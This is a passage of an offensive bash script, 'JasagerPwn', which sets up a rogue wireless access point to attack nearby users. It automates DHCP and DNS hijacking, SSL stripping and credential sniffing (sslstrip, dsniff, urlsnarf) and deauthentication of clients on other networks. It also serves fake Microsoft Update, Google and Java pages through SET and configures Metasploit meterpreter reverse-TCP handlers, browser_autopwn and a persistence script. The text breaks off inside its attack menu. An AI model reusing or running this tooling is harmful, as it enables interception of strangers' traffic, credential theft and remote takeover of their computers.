echo ' \ \|\ / | |\___|'
echo ' \ | \____/ | |'
echo ' /^~> \ _/ <'
echo ' | | \ \'
echo ' | | \ \ \'
echo ' -^-\ \ | )'
echo ' `\_______/^\______/'
echo
echo
echo -e "\e[01;32m[>]\e[00m Stopping services and programs..."
#xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'" -e "airmon-ng stop $MIFACE"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd"
xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" &
sleep 1
echo -e "\e[01;32m[>]\e[00m Checking Environment..."
#test for injection - too glitchy so just got rid of it..
#injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20`
#if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi
#Check for root
if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi
# Check for dependencies, if not install them
#Dependencies checks
dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1`
apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1`
apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1`
dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1`
php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1`
macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1`
aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1`
sleep 1
if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $php5check ] || [ ! $macchangerCheck ] || [ ! $aircrackCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then
echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
fi
# dhcp3-server check
if [ ! $dhcp3check ]; then
echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dhcp3-server && update-rc.d -f dhcp3-server remove"
fi
# dsniff check
if [ ! $dsniffcheck ]; then
echo -e "\e[01;31m[!]\e[00m No Dsniff suite was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install dsniff"
fi
# apache2 check
if [ ! $apache2check ]; then
echo -e "\e[01;31m[!]\e[00m No apache2 server was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install apache2 && update-rc.d -f apache2 remove"
elif [ ! $apache2phpcheck ]; then
echo -e "\e[01;31m[!]\e[00m No apache2 PHP5 module was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install libapache2-mod-php5"
fi
# php5 check
if [ ! $php5check ]; then
echo -e "\e[01;31m[!]\e[00m No PHP5 was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install php5 php5-curl"
fi
# macchanger check
if [ ! $macchangerCheck ]; then
echo -e "\e[01;31m[!]\e[00m No Macchanger was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install macchanger"
fi
# aircrack-ng check
if [ ! $aircrackCheck ] && [ ! -e "/usr/local/bin/aircrack-ng" ]; then
echo -e "\e[01;31m[!]\e[00m No Aircrack-ng suite was detected... Installing.."
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install aircrack-ng"
fi
#sslstrip check
if [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install twisted-web linux-headers-`uname -r` build-essential gcc g++"
wget -q -P "/tmp" http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.8.tar.gz
tar xf /tmp/sslstrip-0.8.tar.gz -C "/tmp/"
chmod +x /tmp/sslstrip-0.8/setup.py
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /tmp/sslstrip-0.8/setup.py install"
if [ -d "/tmp/sslstrip-0.8/" ]; then rm -rf /tmp/sslstrip-0.8/ ; fi
fi
#airdrop-ng check
if [ ! -e "/usr/bin/airdrop-ng" ]; then
if [ -e "/pentest/wireless/airdrop-ng/install.py" ]; then
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "sudo apt-get -y install python2.6 python2.6-dev python-psyco"
chmod +x /pentest/wireless/airdrop-ng/install.py
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "python /pentest/wireless/airdrop-ng/install.py"
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Dependencies Installation" -e "airdrop-ng -u OUIUPDATE"
else
echo -e "\e[01;31m[!]\e[00m ERROR: Cant Find Airdrop-ng Installer.. Do it manually."
fi
fi
#metasploit check
if [ ! -e "$msfpath/msfconsole" ]; then echo && echo -e "\e[01;31m[!]\e[00m ERROR: Metasploit wasnt found in: "$msfpath"" && echo && cleanup; fi
#SET check
if [ ! -e "$SETpath/set-automate" ]; then
echo && echo -e "\e[01;31m[!]\e[00m ERROR: Social Engineering Toolkit wasnt found in: "$SETpath"" && echo && cleanup
else
# python pefile module - thanks redmeat_uk
if [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m No Python PEfile module was detected... Installing.."
if [ -e "/tmp/pefile-1.2.10-102.tar.gz" ]; then rm -rf /tmp/pefile-1.2.10-102* ; fi
wget -q -P "/tmp" http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz
tar xf /tmp/pefile-1.2.10-102.tar.gz -C /tmp/
mv /tmp/pefile-1.2.10-102/pefile.py $SETpath/src/payloadgen/
chmod +x $SETpath/src/payloadgen/pefile.py
if [ -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m Installation Complete!"
elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then
echo -e "\e[01;31m[!]\e[00m Installation Failed!"
fi
if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi
fi
fi
#put up monitor interfaces
#loopbreak=`ifconfig | grep mon4 | awk '{print $1}' | cut -b 4`
monAttempts="0"
while [ ! $moncheck ];
do
if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi
#if [ ! $loopbreak ]; then sleep 1; else break; fi
#ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE"
moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
#ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
monAttempts=$(($monAttempts+1))
done
#copy over the DNS-compatible persistence script
if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi
#clean up www folders
if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi
if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi
if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi
sleep 1 #patience
if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi
if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi
if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi
if [ ! -d "/tmp/collected" ]; then mkdir /tmp/collected/ ; fi
#backup old default index.html
if [ -e /var/www/index.htm ]; then
mv /var/www/index.htm /var/www/index.htm.OLD
elif [ -e /var/www/index.html ]; then
mv /var/www/index.html /var/www/index.html.OLD
fi
#fake update page
if [ -d "$Fwww/" ] ; then
cp -rf src/wwwFakeupdate/* $Fwww/
fi
# google page
cp -rf src/wwwGoogle/* $Gwww/
# java required page
cp -rf src/wwwJava/* $Jwww/
if [ ! $googleRev ]; then
echo -n
elif [ $googleRev -gt $rev ]; then
echo
echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u"
echo
fi
echo -e "\e[01;32m[>]\e[00m Creating scripts..."
#Dynamic variables in case SET changes, which it does and will.
SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'`
SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'`
SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'`
SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'`
SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'`
#SET_CONFIG Text Parsing Variables - for javapwn
APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"`
APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"`
AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"`
JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"`
#back up the original SET config
if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then
cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL
fi
#Customize SET config to how we want it..
if [ ! "$APACHESVR" ]; then
sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ "$APACHESVR" ]; then
mv $SETpath/config/set_config $SETpath/config/set_config2
fi
sleep 2
if [ ! "$APACHEDIR" ]; then
sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3
# > $SEETpath/config/set_configTMP && mv set_configTMP set_config
#mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd
elif [ "$APACHEDIR" ]; then
mv $SETpath/config/set_config2 $SETpath/config/set_config3
fi
sleep 2
if [ ! "${AREDIRECT}" ]; then
sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ ! "$AREDIRECT" ]; then
mv $SETpath/config/set_config3 $SETpath/config/set_config4
fi
sleep 2
if [ ! "${JREPEATER}" ]; then
sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
elif [ "$JREPEATER" ]; then
mv $SETpath/config/set_config4 $SETpath/config/set_config5
fi
sleep 2
if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then
#edit for meterpreter script mode
# if [ ! "$meterpreterS" ]; then
sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6
# > $SETpath/config/set_configTMP && mv set_configTMP set_config
# fi
elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then
sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5
fi
sleep 2
#move config to right spot
if [ -e "$SETpath/config/set_config6" ]; then
mv $SETpath/config/set_config6 $SETpath/config/set_config
fi
if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then
mv $SETpath/config/set_config5 $SETpath/config/set_config
elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then
mv $SETpath/config/set_config5 $SETpath/config/set_config
elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then
mv $SETpath/config/set_config6 $SETpath/config/set_config
fi
sleep 3
#make sure we clean up
if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi
if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi
if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi
if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi
if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi
#Make loop script to ensure our DNS and IP
cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL
echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh
chmod +x /tmp/resolv.sh
xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" &
dnsID2=`echo $!`
#Background loop to parse SSLstrip logins
#while true; do SSLparse && sleep 5 ; done &
#parseID=`echo $!`
#DHCP CONF
if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi
if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi
echo -e "#fakeAP.dhcp
ddns-update-style none;
one-lease-per-client false;
authoritative;
ignore client-updates; # Ignore all client requests for DDNS update
default-lease-time 60; # 24 hours=86400
max-lease-time 72; # 48 hours=172800
log-facility local7;\n
subnet 192.168.10.0 netmask 255.255.255.0 {
interface $FONIFACE;
range 192.168.10.3 192.168.10.250;
option routers 192.168.10.2;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.10.255;
option domain-name-servers 192.168.10.2;
option domain-name \"$DomainName\";
allow unknown-clients;
}" >> /etc/dhcp3/dhcpd.conf
#backup original SET templates
if [ -e "$SETpath/src/html/templates/java/index.template" ]; then
mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL"
cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
else
cp -rf src/wwwJava/* $SETpath/src/html/templates/java/
fi
if [ -e "$SETpath/src/html/templates/google/index.template" ]; then
mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL"
cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
else
cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/
fi
#Airdrop-ng Deauther CONF
#ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'`
if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi
echo "# Jasager - deauth.conf v$version
a/$ourAPmac|any
a/00:00:00:00:00:00|any
d/any|any" > /tmp/deauth.conf
#Add our wifi gateway if needed
wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
if [ $WiFiMODE -eq "1" ]; then
newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'`
echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf
#elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then
#echo
#echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.."
#echo
fi
#Host file - MITM WEBSITE
if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi
echo "$fonIP *" > /tmp/BP.dns
#Vhosts javapwn
vhost="/etc/apache2/sites-available/javapwn"
if [ -e "$vhost" ] ; then rm "$vhost"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Jwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.html
ErrorDocument 404 /index.html
" >> $vhost
#Vhosts google
vhost2="/etc/apache2/sites-available/google"
if [ -e "$vhost2" ] ; then rm "$vhost2"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Gwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.html
ErrorDocument 404 /index.html
" >> $vhost2
#Vhosts fakeupdate
vhost3="/etc/apache2/sites-available/fakeupdate"
if [ -e "$vhost3" ] ; then rm "$vhost3"; fi
echo "
ServerAdmin webmaster@localhost
DocumentRoot $Fwww
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
CustomLog /var/log/apache2/access.log combined
Alias /doc/ "/usr/share/doc/"
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 127.0.0.0/255.0.0.0 ::1/128
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php
" >> $vhost3
#SET automate scripts, can be TOUCHY.
#run as template rather than imported
if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi
echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2
# echo -e "2
# 1
# 1
# 1
# 2
# 16" > /tmp/auto-java2
#run as template rather than imported
if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi
echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2
# echo -e "2
# 1
# 1
# 3
# 2
# 16" > /tmp/auto-google2
#DIFFERENT METHOD OF USING THE TEMPLATES.
#fancy clone of java DL website - not used
# if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi
# echo -e "2
# 1
# 3
# $pwd/src/wwwJava/
# 2
# 16" > /tmp/auto-java
#fancy clone of google - not used
# if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi
# echo -e "2
# 1
# 3
# $pwd/src/wwwGoogle/
# 2
# 16" > /tmp/auto-google
if [ $autoMetScript -eq 1 ]; then
metScript
#Metasploit rc w/ auto script
if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
echo -e "use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set ExitOnSession false
set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
exploit -j" > /tmp/msfrc
#Metasploit rc w/ auto script BP
if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
echo -e "use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set SRVPORT 80
set SRVHOST $ourIP
set URIPATH /
set ExitOnSession false
set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file
run -j" > /tmp/msfrcBP
elif [ $autoMetScript -eq 0 ]; then
#Metasploit rc no auto script
if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi
echo -e "use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set ExitOnSession false
exploit -j" > /tmp/msfrc
#Metasploit rc no auto script BP
if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi
echo -e "use auxiliary/server/browser_autopwn
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $ourIP
set SRVPORT 80
set SRVHOST $ourIP
set URIPATH /
set ExitOnSession false
run -j" > /tmp/msfrcBP
fi
sleep 1
#USING DNS VIA IPTABLES TO GATEWAY
#echo -e "\e[01;32m[>]\e[00m Starting DNS services..."
#xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" &
#xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" &
#DNSID=`echo $!`
echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..."
xterm -geometry 0x0+0+0 -e "modprobe tun" &
echo "1" > /proc/sys/net/ipv4/ip_forward
#tail messages for DHCP info
xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" &
messageID=`echo $!`
echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..."
xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" &
echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..."
xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" &
xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" &
dsniffID=`echo $!`
xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" &
echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..."
IPTABLES
echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! More @ www.info-s3curity.com"
echo
#MAIN OPTIONS FOR AP ATTACKS
while true
do
echo
echo
echo
ifconfig $FONIFACE $fonIP
echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m"
echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m"
#echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it "
if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then
echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m"
elif [ $sniffing -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m"
elif [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m"
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m"
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m"
fi
echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network."
echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)"
echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)"
echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) "
echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs."
echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings"
echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script"
echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m "
read -e CONFIRM3
echo
case $CONFIRM3 in
s|S|sniff|Sniff|1)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict."
elif [ $javaATK -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict."
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict."
elif [ $sniffing -eq 0 ]; then
iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
if [ -e sslstrip.log ]; then
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
else
touch sslstrip.log
xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
TAILPID=`echo $!`
fi
echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing"
wasSniffing="1"
sniffing="1"
elif [ $sniffing -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!"
fi
#xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" &
;;
J|j|java|Java|4)
if [ $browserpwn -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict."
elif [ $fakeupdate -eq 1 ]; then
echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict."
elif [ $javaATK -eq 0 ]; then
echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: "
read -e JavaSite
case $JavaSite in
G|g|Google|google|1)
if [ $autoMetScript -eq 1 ]; then metScript; fi
javasite="1"
JavaSite
xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload"
xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" &
;;
J|j|Java|java|2)
if [ $autoMetScript -eq 1 ]; then metScript; fi
javasite="2" && sleep 1
JavaSite
xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart"
xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload"
xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" &
;;
*) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.."
esac
echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.."
read -e $blahblahblah
ipTableRedirect
if [ $autoMetScript -eq 1 ]; then metScript; fi
echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..."
#iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP
#iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
#iptables --table nat --append PREROUTING --in-interface $FONIFACE
